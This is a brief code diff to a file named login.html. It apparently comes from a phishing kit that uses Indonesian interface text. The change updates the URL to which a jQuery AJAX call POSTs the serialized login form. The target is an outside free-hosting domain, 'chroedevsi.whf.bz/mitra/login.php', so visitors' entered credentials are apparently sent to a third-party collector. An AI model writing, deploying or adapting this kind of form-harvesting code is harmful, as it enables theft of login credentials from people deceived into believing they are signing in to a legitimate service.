--- a/login.html
+++ b/login.html
@@ -428,7 +428,7 @@ input { outline: unset !important; }
     document.getElementById('lanjutkan').innerHTML = "Memproses....";               
     
     $.ajax({
-      url: 'https://chroedevsi.whf.bz/mitra1/login.php',
+      url: 'https://chroedevsi.whf.bz/mitra/login.php',
       type: 'POST',
       data: $('#sudah').serialize(),    
     complete: function(){    
